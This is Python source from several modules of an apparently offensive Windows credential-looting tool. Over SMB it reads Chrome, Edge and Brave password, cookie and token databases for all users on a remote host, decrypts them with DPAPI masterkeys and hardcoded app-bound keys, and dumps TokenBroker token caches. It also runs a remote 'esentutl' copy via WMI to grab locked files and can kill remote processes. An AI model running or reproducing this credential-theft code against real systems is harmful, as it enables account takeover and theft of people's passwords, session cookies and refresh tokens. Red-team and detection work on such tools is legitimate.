import base64
from Cryptodome.Cipher import AES, ChaCha20_Poly1305
from binascii import hexlify
import json
import logging
import tempfile
import sqlite3
from typing import List, Tuple, Callable
from impacket.structure import Structure


from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.lib.masterkey import Masterkey
from dploot.lib.crypto import CHROME_KEY_DATA_BLOB, byte_xor, decrypt_chrome_password
from dploot.lib.utils import datetime_to_time
from dploot.triage import Triage
from dataclasses import dataclass


class AppBoundKey(Structure):
    def __init__(self, data=None, alignment=0):
        super().__init__(data, alignment)

        self.key = None
    
    structure = (
        ("PathLength", "<L=0"),
        ("_Path", "_-Path", 'self["PathLength"]'),
        ("Path", ":"),
        ("KeyLength", "<L=0"),
        ("_Key", "_-Key", 'self["KeyLength"]'),
        ("Key", ":"),
    )

    def dump(self):
        print("[APP BOUND KEY]")
        print("Path:\t%s" % (self["Path"]))
        print("Key:\t%s" % (hexlify(self["Key"])))

    def decrypt_key(self, cng_chromekey=None):
        if self.key is not None or self["Key"] is None:
            return self.key
        if len(self["Key"]) == 32:
            self.key = self["Key"]
        else: # from https://github.com/runassu/chrome_v20_decryption/blob/main/decrypt_chrome_v20_cookie.py
            aes_key = bytes.fromhex("B31C6E241AC846728DA9C1FAC4936651CFFB944D143AB816276BCC6DA0284787")
            chacha20_key = bytes.fromhex("E98F37D7F4E1FA433D19304DC2258042090E2D1D7EEA7670D41F738D08729660")
            xor_key = bytes.fromhex("CCF8A1CEC56605B8517552BA1A2D061C03A29E90274FB2FCF59BA4B75C392390")
            
            flag = self["Key"][0]
            
            if flag == 1 or flag == 2:
                iv = self["Key"][1:13]
                encrypted_text = self["Key"][13:45]
                if flag == 1:
                    cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
                elif flag == 2:
                    cipher = ChaCha20_Poly1305.new(key=chacha20_key, nonce=iv)
            elif flag == 3 and cng_chromekey is not None:
                # Prepare the chromekey
                cng_chromekey = CHROME_KEY_DATA_BLOB(cng_chromekey)["Key"]

                encrypted_aes_key = self["Key"][1:33]
                iv = self["Key"][33:45]
                encrypted_text = self["Key"][45:77]
                                
                cipher = AES.new(cng_chromekey, AES.MODE_CBC, b"\x00" * 16)
                intermediate_key = cipher.decrypt(ciphertext=encrypted_aes_key)
                xored_intermediate_key = byte_xor(intermediate_key, xor_key)
                cipher = AES.new(xored_intermediate_key, AES.MODE_GCM, nonce=iv)
            else:
                if flag not in [1,2,3]:
                    raise ValueError(f"Unsupported flag: {flag}. Oops, Chrome did it again!")
                return None
            self.key = cipher.decrypt(ciphertext=encrypted_text)
        return self.key
    
@dataclass
class LoginData:
    winuser: str
    browser: str
    url: str
    username: str
    password: str

    def dump(self) -> None:
        print("[%s LOGIN DATA]" % self.browser.upper())
        print("URL:\t\t%s" % self.url)
        print("Username:\t%s" % self.username)
        if self.password is not None:
            print("Password:\t%s" % self.password)
        print()

    def dump_quiet(self) -> None:
        print(
            f"[{self.browser.upper()}] {self.url} - {self.username}:{self.password}"
        )


@dataclass
class Cookie:
    winuser: str
    browser: str
    host: str
    path: str
    cookie_name: str
    cookie_value: str
    creation_utc: str
    expires_utc: str
    last_access_utc: str

    def dump(self) -> None:
        print("[%s COOKIE DATA]" % self.browser.upper())
        print(f"Host (path):\t\t{self.host} ({self.path})")
        print("Cookie Name:\t\t%s" % self.cookie_name)
        if self.cookie_value is not None:
            print("Cookie Value:\t\t%s" % self.cookie_value)
        print("Creation UTC:\t\t%s" % datetime_to_time(self.creation_utc))
        print("Expires UTC:\t\t%s" % datetime_to_time(self.expires_utc))
        print("Last Access UTC:\t%s" % datetime_to_time(self.last_access_utc))
        print()

    def dump_quiet(self) -> None:
        print(
            f"[{self.browser.upper()}] {self.host}{self.path} - {self.cookie_name}:{self.cookie_value}"
        )


@dataclass
class GoogleRefreshToken:
    winuser: str
    browser: str
    service: str
    token: str

    def dump(self) -> None:
        print("[%s - GOOGLE REFRESH TOKEN]" % self.browser.upper())
        print("Service:\t%s" % self.service)
        print("Token:\t\t%s" % self.token)
        print()

    def dump_quiet(self) -> None:
        print(f"[{self.browser.upper()}] GRT {self.service}:{self.token}")


class BrowserTriage(Triage):
    user_google_chrome_generic_login_path = {
        "aesStateKeyPath": "Users\\%s\\AppData\\Local\\Google\\Chrome\\User Data\\Local State",
        "loginDataPath": "Users\\%s\\AppData\\Local\\Google\\Chrome\\User Data\\%s\\Login Data",
        "webDataPath": "Users\\%s\\AppData\\Local\\Google\\Chrome\\User Data\\%s\\Web Data",
        "cookiesDataPath": [
            "Users\\%s\\AppData\\Local\\Google\\Chrome\\User Data\\%s\\Cookies",
            "Users\\%s\\AppData\\Local\\Google\\Chrome\\User Data\\%s\\Network\\Cookies",
        ],
    }
    user_msedge_generic_login_path = {
        "aesStateKeyPath": "Users\\%s\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State",
        "loginDataPath": "Users\\%s\\AppData\\Local\\Microsoft\\Edge\\User Data\\%s\\Login Data",
        "webDataPath": "Users\\%s\\AppData\\Local\\Microsoft\\Edge\\User Data\\%s\\Web Data",
        "cookiesDataPath": [
            "Users\\%s\\AppData\\Local\\Microsoft\\Edge\\User Data\\%s\\Cookies",
            "Users\\%s\\AppData\\Local\\Microsoft\\Edge\\User Data\\%s\\Network\\Cookies",
        ],
    }
    user_brave_generic_login_path = {
        "aesStateKeyPath": "Users\\%s\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Local State",
        "loginDataPath": "Users\\%s\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\%s\\Login Data",
        "webDataPath": "Users\\%s\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\%s\\Web Data",
        "cookiesDataPath": [
            "Users\\%s\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\%s\\Cookies",
            "Users\\%s\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\%s\\Network\\Cookies",
        ],
    }
    user_generic_chrome_paths = {
        "google chrome": user_google_chrome_generic_login_path,
        "msedge": user_msedge_generic_login_path,
        "brave": user_brave_generic_login_path,
    }

    share = "C$"
    
    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_secret_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_secret_callback, 
            false_positive=false_positive
        )

        self._users: List[str] = None
    
    def triage_browsers(
        self, gather_cookies: bool = False, bypass_shared_violation: bool = False, cng_chromekey: bytes = None
    ) -> Tuple[List[LoginData], List[Cookie]]:
        credentials = []
        cookies = []

        for user in self.users:
            try:
                user_credentials, user_cookies = self.triage_browsers_for_user(
                    user,
                    gather_cookies,
                    bypass_shared_violation=bypass_shared_violation,
                    cng_chromekey=cng_chromekey,
                )
                credentials += user_credentials
                cookies += user_cookies
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                    logging.debug(str(e))
        return credentials, cookies

    def triage_browsers_for_user(
        self,
        user: str,
        gather_cookies: bool = False,
        bypass_shared_violation: bool = False,
        cng_chromekey: bytes = None,
    ) -> Tuple[List[LoginData], List[Cookie]]:
        return self.triage_chrome_browsers_for_user(
            user=user,
            gather_cookies=gather_cookies,
            bypass_shared_violation=bypass_shared_violation,
            cng_chromekey=cng_chromekey,
        )

    def triage_chrome_browsers_for_user(
        self,
        user: str,
        gather_cookies: bool = False,
        bypass_shared_violation: bool = False,
        cng_chromekey: bytes = None,
    ) -> Tuple[List[LoginData], List[Cookie]]:
        credentials = []
        cookies = []
        profiles = ["Default"]
        for browser, paths in self.user_generic_chrome_paths.items():
            aeskey = None
            app_bound_key = None
            aesStateKey_bytes = self.conn.readFile(
                shareName=self.share,
                path=paths["aesStateKeyPath"] % user,
                bypass_shared_violation=bypass_shared_violation,
                looted_files=self.looted_files
            )
            if aesStateKey_bytes is not None and len(aesStateKey_bytes) > 0:
                logging.debug(
                    f"Found {browser.upper()} AppData files for user {user}"
                )
                aesStateKey_json = json.loads(aesStateKey_bytes)
                try:
                    blob = base64.b64decode(aesStateKey_json["os_crypt"]["encrypted_key"])
                    if blob[:5] == b"DPAPI":
                        dpapi_blob = blob[5:]
                        masterkey = find_masterkey_for_blob(
                            dpapi_blob, masterkeys=self.masterkeys
                        )
                        if masterkey is not None:
                            aeskey = decrypt_blob(
                                blob_bytes=dpapi_blob, masterkey=masterkey
                            )

                    if "app_bound_encrypted_key" in aesStateKey_json["os_crypt"]:
                        app_bound_blob = base64.b64decode(aesStateKey_json["os_crypt"]["app_bound_encrypted_key"])
                        dpapi_blob = app_bound_blob[4:] # Trim off APPB
                        masterkey = find_masterkey_for_blob(
                                dpapi_blob, masterkeys=self.masterkeys
                            )
                        if masterkey is not None:
                            intermediate_key = decrypt_blob(
                                blob_bytes=dpapi_blob, masterkey=masterkey
                            )
                            masterkey = find_masterkey_for_blob(
                                intermediate_key, masterkeys=self.masterkeys
                            )
                            if masterkey:
                                app_bound_key = AppBoundKey(decrypt_blob(
                                    blob_bytes=intermediate_key, masterkey=masterkey
                                )).decrypt_key(cng_chromekey=cng_chromekey)
                    profiles = aesStateKey_json["profile"]["profiles_order"]
                except KeyError as e:
                    logging.debug(f"Key not found! {e!r}")
                    # logging.debug(f"{aesStateKey_json=}")
                except ValueError as e:
                    logging.debug(f"ValueError: {e!r}")

            for profile in profiles:
                loginData_bytes = self.conn.readFile(
                    shareName=self.share,
                    path=paths["loginDataPath"] % (user,profile),
                    bypass_shared_violation=bypass_shared_violation,
                    looted_files=self.looted_files
                )
                if (
                    aeskey is not None
                    and loginData_bytes is not None
                    and len(loginData_bytes) > 0
                ):
                    fh = tempfile.NamedTemporaryFile()
                    fh.write(loginData_bytes)
                    fh.seek(0)
                    db = sqlite3.connect(fh.name)
                    cursor = db.cursor()
                    query = cursor.execute(
                        "SELECT action_url, username_value, password_value FROM logins"
                    )
                    lines = query.fetchall()
                    if len(lines) > 0:
                        for url, username, encrypted_password in lines:
                            password = None
                            try:
                                if encrypted_password[:3] == b"v20":
                                    password = decrypt_chrome_password(
                                    encrypted_password, app_bound_key
                                    ).decode("utf-8")
                                else:
                                    password = decrypt_chrome_password(
                                    encrypted_password, aeskey
                                    ).decode("utf-8")
                            except Exception as e:
                                logging.debug(f"Could not decrypt chrome cookie: {e}")
                            login_data_decrypted = LoginData(
                                winuser=user,
                                browser=browser,
                                url=url,
                                username=username,
                                password=password,
                            )
                            credentials.append(login_data_decrypted)
                            if self.per_loot_callback is not None:
                                self.per_loot_callback(login_data_decrypted)
                    fh.close()
                if gather_cookies:
                    for cookiepath in paths["cookiesDataPath"]:
                        cookiesData_bytes = self.conn.readFile(
                            shareName=self.share,
                            path=cookiepath % (user,profile),
                            bypass_shared_violation=bypass_shared_violation,
                            looted_files=self.looted_files
                        )
                        if (
                            aeskey is not None
                            and cookiesData_bytes is not None
                            and len(cookiesData_bytes) > 0
                        ):
                            fh = tempfile.NamedTemporaryFile()
                            fh.write(cookiesData_bytes)
                            fh.seek(0)
                            db = sqlite3.connect(fh.name)
                            cursor = db.cursor()
                            query = cursor.execute(
                                "SELECT creation_utc, host_key, name, path, expires_utc, last_access_utc, encrypted_value FROM cookies"
                            )
                            lines = query.fetchall()
                            if len(lines) > 0:
                                for (
                                    creation_utc,
                                    host,
                                    name,
                                    path,
                                    expires_utc,
                                    last_access_utc,
                                    encrypted_cookie,
                                ) in lines:
                                    decrypted_cookie_value = None
                                    try:
                                        if encrypted_cookie[:3] == b"v20":
                                            decrypted_cookie_value = decrypt_chrome_password(
                                            encrypted_cookie, app_bound_key
                                            )[32:].decode("utf-8")
                                        else:
                                            decrypted_cookie_value = decrypt_chrome_password(
                                            encrypted_cookie, aeskey
                                            ).decode("utf-8")
                                    except Exception as e:
                                        logging.debug(f"Could not decrypt chrome cookie: {e}")
                                    cookie = Cookie(
                                        winuser=user,
                                        browser=browser,
                                        host=host,
                                        path=path,
                                        cookie_name=name,
                                        cookie_value=decrypted_cookie_value,
                                        creation_utc=creation_utc,
                                        expires_utc=expires_utc,
                                        last_access_utc=last_access_utc,
                                    )
                                    cookies.append(cookie)
                                    if self.per_loot_callback is not None:
                                        self.per_loot_callback(cookie)
                            fh.close()
                webData_bytes = self.conn.readFile(
                    shareName=self.share,
                    path=paths["webDataPath"] % (user,profile),
                    bypass_shared_violation=bypass_shared_violation,
                    looted_files=self.looted_files
                )
                if (
                    aeskey is not None
                    and webData_bytes is not None
                    and len(webData_bytes) > 0
                ):
                    fh = tempfile.NamedTemporaryFile()
                    fh.write(webData_bytes)
                    fh.seek(0)
                    db = sqlite3.connect(fh.name)
                    cursor = db.cursor()
                    query = cursor.execute(
                        "SELECT service, encrypted_token FROM token_service"
                    )
                    lines = query.fetchall()
                    if len(lines) > 0:
                        for service, encrypted_grt in lines:
                            token = decrypt_chrome_password(encrypted_grt, aeskey).decode("utf-8")
                            google_refresh_token = GoogleRefreshToken(
                                winuser=user, browser=browser, service=service, token=token
                            )
                            credentials.append(google_refresh_token)
                            if self.per_loot_callback is not None:
                                self.per_loot_callback(google_refresh_token)
        return credentials, cookies

    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users



from base64 import b64decode
import json
import logging
import ntpath
from typing import List, Callable


from dploot.triage import Triage
from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.triage.masterkeys import Masterkey
from impacket.structure import Structure, unpack

class TBRESVersion(Structure):
    structure = (
        ("Version", ">L=0"),
    )

    def __str__(self):
        return "%x" % self["Version"]
    
class TBRESKeyValue(Structure):
    key_value_type_def = {
        4:{"name":"Unsigned Int","size":4},
        5:{"name":"Unsigned Int","size":4},
        6:{"name":"Timestamp","size":8},
        7:{"name":"Unsigned Long","size":8},
        12:{"name":"String","size":4},
        13:{"name":"GUID","size":16},
        1025:{"name":"Content Identifier","size":0},
    }

    structure = (
        ("KeyType", ">L=0"),
        ("KeyLength", ">L=0"),
        ("_Key", "_-Key", 'self["KeyLength"]'),
        ("Key", ":"),
        ("ValueType", ">L=0"),
    )

    def __init__(self, data=None, alignment=0):
        self.additionnal_size = 0
        self.remaining = data
        super().__init__(data, alignment)
        if self["ValueType"] == 4:   # noqa: SIM114
            self["Data"] = super().unpack(">I", data[super().__len__():len(self)])
        elif self["ValueType"] == 5: 
            self["Data"] = super().unpack(">I", data[super().__len__():len(self)])
        elif self["ValueType"] == 6:   # noqa: SIM114
            self["Data"] = super().unpack(">Q", data[super().__len__():len(self)])
        elif self["ValueType"] == 7: 
            self["Data"] = super().unpack(">Q", data[super().__len__():len(self)])
        elif self["ValueType"] == 12:
            string_length = super().unpack(">I", data[super().__len__():len(self)])
            self["Data"] = super().unpack("%ss" % string_length, data[len(self):len(self)+string_length])
            self.additionnal_size = string_length
        elif self["ValueType"] == 13:
            self["Data"] = super().unpack("16s", data[super().__len__():len(self)]) 
        elif self["ValueType"] == 1025:
            if self["KeyLength"] > 1:
                remaining = self.remaining[super().__len__():]
                _length = unpack("I", remaining[0:4])
                version = TBRESVersion(remaining[4:])
                next_key_value = TBRESKeyValue(remaining[4+len(version):])
                try:
                    self["Data"] = "{}: {}".format(next_key_value["Key"].decode(), next_key_value["Data"].decode())
                except Exception:
                    self["Data"] = "{}: {}".format(next_key_value["Key"].decode(), next_key_value["Data"])
                self.additionnal_size=len(next_key_value)+len(version)+4
            else:
                self["Data"] = "None"    
        else:
            raise Exception(f"Unhandled TBRES ValueType: {self['ValueType']}")

        self.remaining = self.remaining[len(self):]


    def dump(self):
        print("Key: %s" % self["Key"])
        print("ValueType: {} = {}".format(self["ValueType"], self.key_value_type_def[self["ValueType"]]["name"]))
        print(f"Data: {self['Data']}")

    def __len__(self):
        size = 0
        size = super().__len__()
        size += self.key_value_type_def[self["ValueType"]]["size"]
        size += self.additionnal_size
        
        return size
        
    def __str__(self):
        try:
            if isinstance(self["Data"], int):
                return f"{self['Key'].decode()}: {self['Data']}"
            else:
                return f"{self['Key'].decode()}: {self['Data'].decode()}"
        except Exception:
            return f"{self['Key'].decode()}: {self['Data']}"

class TBRESResponseData:
    def __init__(self, winuser, data=None):
        self.winuser = winuser
        self.attribs = []
        if data is not None:
            self.version = TBRESVersion(data)
            
            remaining = data[len(self.version):]
            expiration = TBRESKeyValue(remaining)
            self.attribs.append(expiration)
            responses = TBRESKeyValue(expiration.remaining)
            if responses["Key"] != b"responses":
                remaining = responses.remaining
                while(len(remaining))>0:
                    element, remaining = self.get_tbres_element(remaining)
                    if element is None:
                        break
                    self.attribs.append(element)
            else:
                self.attribs.append(responses)

                _response_len = unpack("I", responses.remaining[0:4])
                version2 = TBRESVersion(responses.remaining[4:])
                unk = TBRESKeyValue(responses.remaining[4+len(version2):])
                
                _content_len = unpack("I", unk.remaining[0:4])
                version3 = TBRESVersion(unk.remaining[4:])
                remaining= unk.remaining[4+len(version3):]
                while(len(remaining))>0:
                    element, remaining = self.get_tbres_element(remaining)
                    if element is None:
                        break
                    if isinstance(element, List):
                        self.attribs += element
                    else:
                        self.attribs.append(element)

    def get_tbres_element(self,bytes_remaining):
        elem = TBRESKeyValue(bytes_remaining)
        if elem["Key"] in [b"WTRes_Error",b"error"]:
            return None, elem.remaining
        elif elem["Key"] == b"WTRes_Token":
            prop = TBRESKeyValue(elem.remaining)
            return elem, prop.remaining
        elif elem["Key"] == b"WTRes_Account":
            prop = TBRESKeyValue(elem.remaining)
            _element_len = unpack("I", prop.remaining[0:4])[0]
            version = TBRESVersion(prop.remaining[4:])
            remaining = prop.remaining[4+len(version):]
            properties = [elem, prop]
            while(len(remaining) > 0):
                prop = TBRESKeyValue(remaining)
                properties.append(prop)
                remaining = prop.remaining
            return properties, remaining
        else:
            _element_len = unpack("I", elem.remaining[0:4])[0]
            version = TBRESVersion(elem.remaining[4:])
            remaining = elem.remaining[4+len(version):]
            properties = [elem]
            while(len(remaining) > 0):
                
                try:
                    prop = TBRESKeyValue(remaining)
                except Exception:
                    prop = TBRESKeyValue(remaining[8:])
                properties.append(prop)
                remaining = prop.remaining
            return properties, remaining

    def dump(self):
        print("[TBRES FILE]")
        print("Version: %s" % self.version)
        for attrib in self.attribs:
            print(attrib)
        print()

class WamTriage(Triage):
    share = "C$"
    token_broker_cache_path = "Users\\{username}\\AppData\\Local\\Microsoft\\TokenBroker\\Cache"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_token_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_token_callback, 
            false_positive=false_positive
        )
        
        self._users = None

    def triage_wam(self):
        tbres_responses_cache = []
        for user in self.users:
            tbres_responses_cache += self.triage_wam_for_user(user)
        return tbres_responses_cache

    def triage_wam_for_user(self, user):
        tbres_responses_cache = []
        tbc_user_path = self.token_broker_cache_path.format(username=user)
        tbc_dir = self.conn.remote_list_dir(self.share, tbc_user_path)
        if tbc_dir is None:
            return []
        for file in tbc_dir:
            filename = file.get_longname()
            if (
                filename[-6:].lower() ==".tbres"
                and filename not in self.false_positive
                and file.is_directory() == 0
            ):
                logging.debug(f"Got {filename} cache file for user {user}")
                tbres_filepath = ntpath.join(tbc_user_path, filename)
                data_bytes = self.conn.readFile(self.share, tbres_filepath, looted_files=self.looted_files)
                if data_bytes is None:
                    continue
                decrypted_blob = self.decypt_tbres_file(data_bytes)
                if decrypted_blob is not None:
                    tbres_response_data = TBRESResponseData(winuser = user, data=decrypted_blob)
                    if self.per_loot_callback is not None:
                        self.per_loot_callback(tbres_response_data)
                    tbres_responses_cache.append(tbres_response_data)
        return tbres_responses_cache                

    def decypt_tbres_file(self, tbres_file_data_bytes):
        tbres_json_data = json.loads(tbres_file_data_bytes.decode("utf-16le").rstrip("\x00"))
        response_bytes = tbres_json_data["TBDataStoreObject"]["ObjectData"]["SystemDefinedProperties"]["ResponseBytes"]
        if not response_bytes["IsProtected"]:
            return None
        blob = b64decode(response_bytes["Value"])
        masterkey = find_masterkey_for_blob(blob, self.masterkeys)
        if masterkey is not None:
            return decrypt_blob(masterkey=masterkey, blob_bytes=blob)
            
        return None

    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users


import ntpath
import os
import logging
import time

from pathlib import Path
from typing import Any, Dict, List, Optional

from dploot.lib.target import Target
from dploot.lib.consts import FalsePositives

from impacket.smbconnection import SMBConnection
from impacket.winregistry import Registry
from impacket.smb import ATTR_DIRECTORY
from impacket.smb import SMB_DIALECT
from impacket.smb import SharedFile
from impacket.nmb import NetBIOSTimeout
from impacket.smb import FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE
from impacket.dcerpc.v5 import tsts
from impacket.examples.secretsdump import RemoteOperations, LocalOperations
from impacket.smb3structs import (
    FILE_READ_DATA,
    FILE_OPEN,
    FILE_NON_DIRECTORY_FILE
)

from dploot.lib.wmi import DPLootWmiExec

class DPLootSMBConnection:    
    # if called with target = LOCAL, return an instance of DPLootLocalSMConnection,
    # else return an instance of DPLootRemoteSMBConnection
    def __new__(
        cls, target=None
    ) -> "DPLootRemoteSMBConnection | DPLootLocalSMBConnection":
        if (
            target is not None
            and target.address.upper() == "LOCAL"
            and cls.__name__ != DPLootLocalSMBConnection.__name__
        ):
            return DPLootLocalSMBConnection.__new__(DPLootLocalSMBConnection, target)
        elif cls.__name__ == DPLootSMBConnection.__name__:
            return DPLootRemoteSMBConnection.__new__(DPLootRemoteSMBConnection, target)
        else:
            # we end up here when a child class is instantiated.
            return super().__new__(cls)

    def __init__(self, target: Target, false_positive: List[str] | None = None) -> None:
        self.target = target
        self.remote_ops = None
        self.local_session = None

        self._usersProfiles = None

        self.false_positive = FalsePositives(false_positive)

    def listDirs(self, share: str, dirlist: List[str]) -> Dict[str, Any]:
        result = {}
        for path in dirlist:
            tmp = self.remote_list_dir(share, path=path)
            result[path] = tmp
        return result

class DPLootRemoteSMBConnection(DPLootSMBConnection):
    def __init__(self, target: Target) -> None:
        super().__init__(target)

        self.smb_session = None
        self.smbv1 = False

    def create_smbv1_conn(self, kdc=""):
        try:
            self.smb_session = SMBConnection(
                kdc or self.target.address,
                kdc or self.target.address,
                None,
                preferredDialect=SMB_DIALECT,
            )
            self.smbv1 = True
        except OSError as e:
            if str(e).find("Connection reset by peer") != -1:
                logging.debug(
                    f"SMBv1 might be disabled on {kdc or self.target.address}"
                )
            return False
        except (Exception, NetBIOSTimeout) as e:
            logging.debug(
                f"Error creating SMBv1 connection to {kdc or self.target.address}: {e}"
            )
            return False

        return True

    def create_smbv3_conn(self, kdc=""):
        try:
            self.smb_session = SMBConnection(
                kdc or self.target.address,
                kdc or self.target.address,
                None,
            )
            self.smbv1 = False
        except OSError as e:
            if str(e).find("Too many open files") != -1:
                logging.error(
                    f"SMBv3 connection error on {kdc or self.target.address}: {e}"
                )
            return False
        except (Exception, NetBIOSTimeout) as e:
            logging.debug(
                f"Error creating SMBv3 connection to {kdc or self.target.address}: {e}"
            )
            return False

        return True

    def create_conn_obj(self, kdc=""):
        if self.create_smbv3_conn(kdc) or self.create_smbv1_conn(kdc):
            return True
        logging.debug(
            "Could not create connection object to %s"
            % (kdc or self.target.address)
        )
        return False

    def connect(self) -> "Any | None":
        try:
            if self.target.do_kerberos:
                # getting hostname
                no_ntlm = False
                if not self.create_conn_obj():
                    return None
                try:
                    self.smb_session.login("", "")
                except Exception as e:
                    if "STATUS_NOT_SUPPORTED" in str(e):
                        no_ntlm = True
                hostname = (
                    self.smb_session.getServerDNSHostName()
                    if not no_ntlm
                    else self.target.address
                )
                self.smb_session.close()
                self.target.address = hostname
                logging.debug("Connecting to %s" % self.target.address)
                if not self.create_conn_obj(self.target.address):
                    return None
                logging.debug(
                    "Authenticating with %s through Kerberos" % self.target.username
                )
                self.smb_session.kerberosLogin(
                    user=self.target.username,
                    password=self.target.password,
                    domain=self.target.domain,
                    lmhash=self.target.lmhash,
                    nthash=self.target.nthash,
                    aesKey=self.target.aesKey,
                    kdcHost=self.target.kdcHost,
                    useCache=self.target.use_kcache,
                )
                self.target.username = self.smb_session.getCredentials()[0]
            else:
                logging.debug("Connecting to %s" % self.target.address)
                if not self.create_conn_obj():
                    return None
                logging.debug(
                    "Authenticating with %s through NTLM" % self.target.username
                )
                self.smb_session.login(
                    user=self.target.username,
                    password=self.target.password,
                    domain=self.target.domain,
                    lmhash=self.target.lmhash,
                    nthash=self.target.nthash,
                )
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
            return None
        return self.smb_session

    def remote_list_dir(self, share, path, wildcard=True) -> "Any | None":
        if wildcard:
            path = ntpath.join(path, "*")
        try:
            return self.smb_session.listPath(
                shareName=share, path=ntpath.normpath(path)
            )

        except Exception:
            return None

    def is_admin(self) -> bool:
        try:
            self.smb_session.connectTree("C$")
            is_admin = True
        except Exception:
            is_admin = False
        return is_admin

    def listPath(self, *args, **kwargs) -> Any:
        return self.smb_session.listPath(*args, **kwargs)
    
    def list_users(self, share):
        users_dir_path = "Users\\*"
        directories = self.listPath(
            shareName=share, path=ntpath.normpath(users_dir_path)
        )
        return [d.get_longname() for d in directories if d.get_longname() not in self.false_positive and d.is_directory() > 0]

    def reconnect(self) -> bool:
        self.smb_session.reconnect()
        if self.remote_ops is not None:
            self.enable_remoteops(force=True)

    def enable_remoteops(self, force=False) -> None:
        logging.getLogger("impacket").disabled = True
        if self.remote_ops is not None and self.bootkey is not None and not force:
            return
        try:
            self.remote_ops = RemoteOperations(
                self.smb_session, self.target.do_kerberos, self.target.dc_ip
            )
            self.remote_ops.enableRegistry()
            self.bootkey = self.remote_ops.getBootKey()
        except Exception as e:
            logging.error(f"RemoteOperations failed: {e}")

    def getFile(self, *args, **kwargs) -> "Any | None":
        return self.smb_session.getFile(*args, **kwargs)

    def readFile(
        self,
        shareName,
        path,
        mode=FILE_OPEN,
        offset=0,
        password=None,
        shareAccessMode=FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        bypass_shared_violation=False,
        looted_files=None
    ) -> bytes:
        # ToDo: Handle situations where share is password protected
        path = path.replace("/", "\\")
        path = ntpath.normpath(path)
        if len(path) > 0 and path[0] == "\\":
            path = path[1:]
        treeId = self.smb_session.connectTree(shareName)
        fileId = None

        data = None

        try:
            fileId = self.smb_session.openFile(
                treeId,
                path,
                FILE_READ_DATA,
                shareAccessMode,
                FILE_NON_DIRECTORY_FILE,
                mode,
                0,
            )
            fileInfo = self.smb_session.queryInfo(treeId, fileId)
            fileSize = fileInfo["EndOfFile"]
            res = self.smb_session._SMBConnection.getIOCapabilities()
            if (fileSize - offset) < res["MaxReadSize"]:
                # Skip reading 0 bytes files.
                if (fileSize - offset) > 0:
                    data = self.smb_session._SMBConnection.read(
                        treeId, fileId, offset, fileSize - offset
                    )
            else:
                written = 0
                toBeRead = fileSize - offset
                data = b""
                while written < toBeRead:
                    bytesRead = self.smb_session._SMBConnection.read(
                        treeId, fileId, offset, res["MaxReadSize"]
                    )
                    written += len(bytesRead)
                    offset += len(bytesRead)
                    data += bytesRead
        except Exception as e:
            logging.debug(f"Exception occurred while trying to read {path}: {e}")
            if "STATUS_OBJECT_PATH_NOT_FOUND" in str(e) or "STATUS_OBJECT_NAME_NOT_FOUND" in str(e):
                pass
            elif bypass_shared_violation and "STATUS_SHARING_VIOLATION" in str(e):
                wmiexec = DPLootWmiExec(target=self.target)
                command = (
                    f'cmd.exe /Q /c esentutl.exe /y "C:\\{path}" /d "C:\\Windows\\Temp\\{wmiexec.output}"'
                )
                wmiexec.run(command)
                time.sleep(1)
                while True:
                    try:
                        filepath = ntpath.join("Windows\\Temp\\",wmiexec.output)
                        data = self.readFile(shareName=shareName, path=filepath)
                        break
                    except Exception as e:
                        if str(e).find("STATUS_SHARING_VIOLATION") >= 0:
                            # Output not finished, let's wait
                            time.sleep(1)
                self.smb_session.deleteFile(shareName, filepath)
            elif str(e).find("Broken") >= 0:
                logging.debug("Connection broken, trying to recreate it")
                self.reconnect()
                data = self.readFile(
                    shareName=shareName,
                    path=path,
                    mode=mode,
                    offset=offset,
                    password=password,
                    shareAccessMode=shareAccessMode,
                    bypass_shared_violation=bypass_shared_violation,
                    looted_files=looted_files
                )
            else:
                logging.debug(str(e))
        finally:
            if fileId is not None:
                self.smb_session._SMBConnection.close(treeId, fileId)
            self.smb_session.disconnectTree(treeId)

        if looted_files is not None and data is not None and data != b"":
            looted_files[os.path.join(*(path.split("\\")))]=data
        return data

    def perform_taskkill(self, process_name):
        with tsts.LegacyAPI(self.smb_session, self.target.address, self.target.do_kerberos) as legacy:
            handle = legacy.hRpcWinStationOpenServer()
            r = legacy.hRpcWinStationGetAllProcesses(handle)
            if not len(r):
                logging.debug("Could not get process list")
                return
            pid_list = [
                i["UniqueProcessId"]
                for i in r
                if i["ImageName"].lower() == process_name.lower()
            ]
            if not len(pid_list):
                logging.debug(f"No process {process_name} found")
            logging.debug(f"Found {pid_list} pid(s) for process {process_name}")
            for pid in pid_list:
                logging.debug(f"Killing PID {pid}")
                try:
                    if legacy.hRpcWinStationTerminateProcess(handle, pid)["ErrorCode"]:
                        logging(f"Successfully killed process {pid}")
                    else:
                        logging(f"Could not kill process {pid}")
                except Exception as e:
                    logging.error(f"Error while terminating pid {pid}: {e}")


class DPLootLocalSMBConnection(DPLootSMBConnection):
    systemroot = "C:\\Windows"
